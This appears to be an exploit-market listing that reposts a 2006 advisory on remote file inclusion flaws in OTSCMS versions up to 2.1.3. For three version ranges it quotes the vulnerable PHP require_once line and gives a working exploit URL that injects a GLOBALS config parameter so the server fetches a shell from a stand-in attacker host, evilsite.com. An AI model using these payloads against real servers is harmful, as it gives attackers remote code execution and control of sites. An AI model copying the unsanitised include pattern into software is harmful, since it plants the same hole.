[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

OTSCMS <= 2.1.3 Multiple Remote File Include Vulnerabilities

Author
GregStar
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1047
Category
web applications
Date add
22-10-2006
Platform
unsorted
============================================================
OTSCMS <= 2.1.3 Multiple Remote File Include Vulnerabilities
============================================================




**********************************************************************************************************
                                       *                       *
			               * Coding 4 Fun (c4f.pl) *
			               *                       *
			               *************************

* OTSCMS <= 2.1.3 by Wrzasq (www.otscms.com) ; 

* Class = Remote File Inclusion ;

* Found by = GregStar (gregstar{at}c4f{dot}pl) ;

-------------------------------------------------------------------------------------------------------------------

OTSCMS 2.0.0 - 2.1.3 :

- Vulnerable Code:

 require_once($GLOBALS['config']['directories']['classes'] . $class . '.php');

- Exploit:

http://[target]/[path]/OTSCMS.php?GLOBALS[config][directories][classes]=http://evilsite.com/shell?

-------------------------------------------------------------------------------------------------------------------

OTSCMS 1.3.0 - 1.4.1 :

- Vulnerable Code:

 require_once($GLOBALS['config']['otscms']['directories']['classes'] . $class . '.php');


- Exploit:

http://[target]/[path]/OTSCMS.php?GLOBALS[config][otscms][directories][classes]=http://evilsite.com/shell?

-------------------------------------------------------------------------------------------------------------------

OTSCMS 1.0.0 - 1.0.3 :

- Vulnerable Code:

 require_once($GLOBALS['config']['otscms']['directories']['includes'].'OTSCMSException.class.php');

- Exploit:

http://[target]/[path]/OTSCMS.php?GLOBALS[config][otscms][directories][includes]=http://evilsite.com/shell?

------------------------------------------------------------------------------------------------------------------

Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,RFL,d3m0n,java,kw@ch and for all friends.
**************************************************************************************************************

Notes:
Only works with php5 and 2.1.4 should also be vulnerable using OTSCMS.php with the config variable.



#  0day.today [2024-12-25]  #